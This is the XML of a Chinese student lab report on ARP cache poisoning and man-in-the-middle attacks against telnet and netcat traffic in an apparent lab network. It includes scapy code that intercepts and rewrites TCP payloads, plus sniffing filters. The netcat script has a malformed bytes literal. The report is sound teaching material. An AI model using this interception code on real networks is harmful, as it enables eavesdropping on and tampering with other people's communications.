                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38F0A3CF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.在步骤 5 中，A 和 B 的 ARP 缓存中已经被更新为 M 的 MAC 地址。ARP 欺骗成功，A 和 B 的 ARP 缓存中存储了错误的 MAC 地址。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53DDEAF5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.关闭 IP 转发后，攻击者主机 M 不再转发数据包。虽然 M 依旧可以发送伪造的 ARP 报文，但它无法将数据包转发到 A 和 B 之间。因此，A 和 B 之间的通信会受到影响，导致无法 ping 通。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BF7C0DE"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5BB059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AAECE28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按要求打开路由转发功能对telnet通信双方发起ARP攻击，观察执行结果并进行说明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F278F46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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="55C7B7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D70C84D">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABDAE1A">
            <w:pPr>
              <w:pStyle w:val="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开启转发功能：sysctl net.ipv4.ip_forward=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56647882">
            <w:pPr>
              <w:pStyle w:val="9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在M上运行arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1773EFEB">
            <w:pPr>
              <w:pStyle w:val="9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A ping B：ping 10.9.0.6 -c 1 ，B ping A: ping 10.9.0.5 -c 1，观察情况。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="323E00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65C5A6B3">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1611188C">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5006340" cy="1386205"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
                  <wp:docPr id="3931864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1864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412" cy="138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E23C9">
            <w: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426085</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4831080" cy="494030"/>
                      <wp:effectExtent l="0" t="0" r="26670" b="20955"/>
                      <wp:wrapNone/>
                      <wp:docPr id="680220372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31162" cy="4938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9" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:2.5pt;margin-top:33.55pt;height:38.9pt;width:380.4pt;z-index:251676672;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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NVrjoDVAAAACAEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kDLT0pKdAIAANQEAAAOAAAAAAAAAAEAIAAAACQ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47285" cy="1633220"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
                  <wp:docPr id="9519509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9509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901" cy="163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2B03">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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408940</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5051425" cy="513715"/>
                      <wp:effectExtent l="0" t="0" r="16510" b="20320"/>
                      <wp:wrapNone/>
                      <wp:docPr id="171833477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51204" cy="5134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0" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:-4.75pt;margin-top:32.2pt;height:40.45pt;width:397.75pt;z-index:251677696;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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XuDjHXAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kCO3SgNcgIAANUEAAAOAAAAAAAAAAEAIAAAACYBAABkcnMv&#10;ZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAAAKBg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064760" cy="1675130"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="7443164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3164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473" cy="167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7DBC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4DA815BA">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B89DD2F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.在运行 arp.py 后，攻击者主机 M 向 A 和 B 发送伪造的 ARP 回复报文，导致 A 和 B 的 ARP 缓存中记录了错误的 MAC 地址（M 的 MAC 地址）。这种情况下，A 和 B 会将数据包发送到攻击者主机 M。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB896CC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.因为已开启 IP 转发功能，攻击者主机 M 可以接收来自 A 和 B 的数据包，并将这些数据包转发到正确的目的地。A 和 B 之间的通信可以正常进行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DA2D039"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37FD5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A1B14B1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按要求关闭路由转发功能，对telnet通信双方发起ARP攻击和中间人攻击，观察执行结果并进行说明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF5990E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  <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5BC332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DFFAC54">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B018B2">
            <w:pPr>
              <w:pStyle w:val="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保持开启转发，在M上运行：arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BAB9654">
            <w:pPr>
              <w:pStyle w:val="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在A上开启telnet：telnet 10.9.0.6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C46D5E5">
            <w:pPr>
              <w:pStyle w:val="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关闭ip转发：sysctl net.ipv4.ip_forward=0，在A中输入内容，查看结果。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755F1A44">
            <w:pPr>
              <w:pStyle w:val="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编写sniff_and_spoof.py:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EACF03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6B871D3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3979385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import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A72A489">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B1F1A8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IP_A = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="134A539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MAC_A = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25757C7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IP_B = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27345B9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MAC_B = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EAB57F9">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E5ABF4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spoof_pkt(pkt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A69D0A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if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78757A4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newpkt = IP(bytes(pkt[IP]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE165D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del(newpkt.chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0DA839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del(newpkt[TCP].payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FB83D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del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFE0050">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="075EC6CC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if pkt[TCP].payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59FD296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data = pkt[TCP].payload.load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6029E4C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data = data.decode()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42398A8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newdata = re.sub(r'[a-zA-Z]', r'f', data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3483D1F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print(data + " ==&gt; " + newdata)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="401A5BF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send(newpkt/newdata, verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E47539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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215EDCE4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send(newpkt, verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4CD52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elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519AB141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newpkt = IP(bytes(pkt[IP]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="368EF44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del(newpkt.chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253D8C8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del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4544D6E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send(newpkt, verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF46CA5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47F9004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 = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A1117A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pkt = sniff(filter=f, prn=spoof_pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="740AE5D2">
            <w:pPr>
              <w:pStyle w:val="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在M上运行：sniff_and_spoof.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1055BC2D">
            <w:pPr>
              <w:pStyle w:val="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在A中输入任意内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E07C953">
            <w:pPr>
              <w:pStyle w:val="9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在M上查看</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DA8A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0EEDE7BB">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4ED871">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4712970" cy="2027555"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6555648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56487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32" cy="2032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62260">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4981575" cy="2999740"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="254955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559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17" cy="300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FCD91">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5065395" cy="2709545"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="1451155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15597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673" cy="271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6BBEA">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4903470" cy="384175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="15832094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20940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018" cy="38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30472">
            <w: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40640</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3985260" cy="273685"/>
                      <wp:effectExtent l="0" t="0" r="15875" b="12065"/>
                      <wp:wrapNone/>
                      <wp:docPr id="152057894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5219" cy="2738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1" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:-0.9pt;margin-top:3.2pt;height:21.55pt;width:313.8pt;z-index:251678720;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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uRdYM0wAAAAcBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJl&#10;di54bWxQSwECFAAUAAAACACHTuJAD3ESonQCAADVBAAADgAAAAAAAAABACAAAAAiAQAAZHJzL2Uy&#10;b0RvYy54bWxQSwUGAAAAAAYABgBZAQAACAY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854575" cy="271780"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="3982371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23716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447" cy="27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74BA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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725170</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3574415" cy="254000"/>
                      <wp:effectExtent l="0" t="0" r="26035" b="12700"/>
                      <wp:wrapNone/>
                      <wp:docPr id="477235837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4473" cy="2542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2" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:0.2pt;margin-top:57.1pt;height:20pt;width:281.45pt;z-index:251679744;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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7Ta+jdQAAAAIAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAhQAFAAAAAgAh07iQL90w5l0AgAA1AQAAA4AAAAAAAAAAQAgAAAAIwEAAGRycy9l&#10;Mm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAk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020945" cy="945515"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="6985"/>
                  <wp:docPr id="1976146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1463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268" cy="94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E0A18">
            <w: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688340</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="909320" cy="1104900"/>
                      <wp:effectExtent l="0" t="0" r="24130" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1980082844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9510" cy="11051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3" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:1.35pt;margin-top:54.2pt;height:87pt;width:71.6pt;z-index:251680768;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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6zpMadUAAAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAhQAFAAAAAgAh07iQHfh41ZwAgAA1QQAAA4AAAAAAAAAAQAgAAAAJAEAAGRycy9lMm9E&#10;b2MueG1sUEsFBgAAAAAGAAYAWQEAAAY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4996180" cy="1749425"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                  <wp:docPr id="330095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09515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058" cy="175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D497A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63ADC7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52BE9288">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C959CBC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.通过伪造 ARP 报文，攻击者主机 M 使 A 和 B 将数据包发送到 M。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B7CEFA">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2. sniff_and_spoof.py 脚本拦截并篡改了 A 和 B 之间的通信数据。在脚本中，所有字母字符都被替换成了 f。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3575DCAC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.当 IP 转发被关闭后，攻击者主机 M 不再转发数据包。虽然 ARP 欺骗会使 A 和 B 将数据包发送到 M，但由于 M 不能再转发这些数据包，因此 A 和 B 之间的通信将会中断。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE238E7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.在 A 上输入内容时，telnet 会话的输入内容在 M 上被修改。由于 IP 转发被关闭，A 和 B 之间的通信将无法继续。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E450D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4D9A8E2">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题：任务书中的代码的filter会捕获攻击代码自身产生的报文，从而造成攻击程序的效率很低，请给出解决该问题的filter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF3BDB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>答：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47468238">
            <w:pPr>
              <w:pStyle w:val="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排除攻击者的mac地址：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ACB864A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f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06) and not ether src 02:42:0a:09:00:69'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D225B3C">
            <w:pPr>
              <w:pStyle w:val="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使用IP地址排除自身报文：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED08470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f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06) and not src host 10.9.0.105'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D921C0">
            <w:pPr>
              <w:pStyle w:val="9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只捕捉目标流量：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD764DC">
            <w:pPr>
              <w:pStyle w:val="9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f = 'tcp and ((src host 10.9.0.5 and dst host 10.9.0.6) or (src host 10.9.0.6 and dst host 10.9.0.5)) and not ether src 02:42:0a:09:00:69'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A2EA4E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A78CCF8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk176188457"/>
      <w:r>
        <w:t>Task 3: MITM Attack on Netcat using ARP Cache Poisoning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0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 w14:paraId="08D17C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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="475C0F86">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按要求关闭路由转发功能，对netcat通信双方发起ARP攻击和中间人攻击，观察执行结果并进行说明</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CC61D2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>位置：HOST</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="252B4C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1C3838BF">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00697369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在M上保持arp.py运行：arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACC0729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在B上监听端口：nc -lp 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A425037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A与B连接：nc 10.9.0.6 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C50BAAA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修改sniff_and_spoof.py:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="144D5BC7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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C6A1C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from scapy.all import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3A44BC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import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F6BC585">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64858EB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IP_A = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C168E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MAC_A = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E194D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IP_B = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69180E4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MAC_B = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE91555">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AE44B20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def spoof_pkt(pkt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6322DE0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if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAC460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newpkt = IP(bytes(pkt[IP]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0736B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del(newpkt.chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ECAB87C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del(newpkt[TCP].payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52145B1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del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71F86137">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60B67A9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if pkt[TCP].payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53898CDB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data = pkt[TCP].payload.load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EED8885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newdata = data.replace(a'FanLanlan', b'LanlanFan')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599B43C9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print(str(data) + " ==&gt; " + str(newdata))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34845E5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newpkt[IP].len = pkt[IP].len + len(newdata) - len(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552343A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send(newpkt/newdata, verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E6818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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A032208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    send(newpkt, verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453D6386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elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1FE49E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newpkt = IP(bytes(pkt[IP]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6592728A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del(newpkt.chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E40FC9D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del(newpkt[TCP].chksum)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E27DCC3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  send(newpkt, verbose=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A4D1ADA">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B0BFA42">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>f = 'tcp and (ether src 02:42:0a:09:00:05 or ether src 02:42:0a:09:00:06)'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA48F7E">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pkt = sniff(filter=f, prn=spoof_pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7620A085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在M中运行：sniff_and_spoof.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215E6AF1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重新在A中发送：nc 10.9.0.6 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E9D4AF">
            <w:pPr>
              <w:pStyle w:val="9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查看B收到的信息：nc -lp 9090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A0F6DC">
            <w:pPr>
              <w:pStyle w:val="9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查看M中的信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E2EF4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6AE78FB7">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4F11EC">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4698365" cy="1424940"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
                  <wp:docPr id="327170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1704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265" cy="14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7C133">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4912995" cy="336550"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
                  <wp:docPr id="486944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9442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616" cy="33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41653">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4702810" cy="267335"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1129045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04577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55" cy="2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F76B3">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4673600" cy="1077595"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="628032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0329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887" cy="107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67C64">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4938395" cy="1245235"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="13201125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11250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193" cy="125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FCCC2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4947285" cy="1953895"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
                  <wp:docPr id="423317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31777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093" cy="195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D8AEC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 w14:paraId="7C929802">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75B730E8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.通过 arp.py 发起的 ARP 欺骗攻击使 A 和 B 认为 M 是对方的网关或直接通信对端。导致 A 和 B 的流量都经过 M，从而使 M 可以拦截和篡改这些流量。</w:t>
            </w:r>
          </w:p>
